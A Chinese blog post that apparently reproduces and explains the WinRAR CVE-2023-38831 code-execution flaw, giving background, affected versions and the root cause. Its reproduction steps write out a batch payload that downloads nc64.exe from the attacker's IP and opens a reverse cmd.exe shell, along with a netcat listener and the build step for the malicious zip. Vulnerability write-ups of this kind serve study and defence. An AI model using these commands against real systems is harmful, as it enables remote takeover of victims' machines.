CVE-2023-38831 WinRAR代码执行漏洞

漏洞概况

winRAR介绍

1、常见压缩格式 zip、rar、7z

2、常用压缩软件 WinRAR、Bandizip、7z、360压缩、2345好压

3、发展历史 since 1995

rarlab公司 特性:分卷压缩、支持unicode字符、压缩率高

只有WinRAR软件可以创建rar格式的压缩包,其他软件可以解压

造福无数打工人的WinRAR,为什么活的这么卑微?

https://zhuanlan.zhihu.com/p/639814936

漏洞情况

2023年8月24日 安全公司Group-IB公布漏洞

https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/

影响版本:6.23之前的所有版本

影响级别:千万级

rarlab公司在2023年8月2日发布的6.23版本修补了这一漏洞。

漏洞复现

1、kali启动HTTP服务 在nc64.exe(netcat)目录下: python -m http.server

2、Kali启动端口监听 nc -lnvp 4444 (建立反弹连接)

3、本地POC文件制作 test.png、script.bat,脚本内容 curl http://192.168.14.13:8000/nc64.exe -O nc64.exe & nc64.exe 192.168.14.13 4444 -e cmd.exe -d & test.png python .\make.py test.png script.bat poc.zip

(红色部分以你实际的攻击机IP为准)

script.bat:

通过python脚本构造恶意压缩包:

.\make.py test.png script.bat poc.zip

恶意压缩包构建完成:

4、在WinRAR(<=6.22)中打开POC文件 双击普通文件,漏洞触发(运行script.bat内容、下载nc64.exe、建立反弹连接)

版本信息:

双击打开test.png:

跳出如下界面:

回到攻击机视角,靶机成功上线

漏洞原理

1、当受害者尝试打开存档文件中的"test.png "时, WinRAR会比较存档中的所有文件以查找与"test.png "同 名的文件/目录

2、如果存在与"test.png "同名的目录,WinRAR则会继 续检查"test.png /"目录下的文件

3、如果"test.png /"目录下同样存在文件名为"test.png " 的文件则将"test.png /"目录下"test.png "文件放入提取 列表中

4、最终导致压缩包中的test.png .cmd被解压出来,并且运行

详情请看下篇文章:

https://blog.csdn.net/qq_38924942/article/details/132571600

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值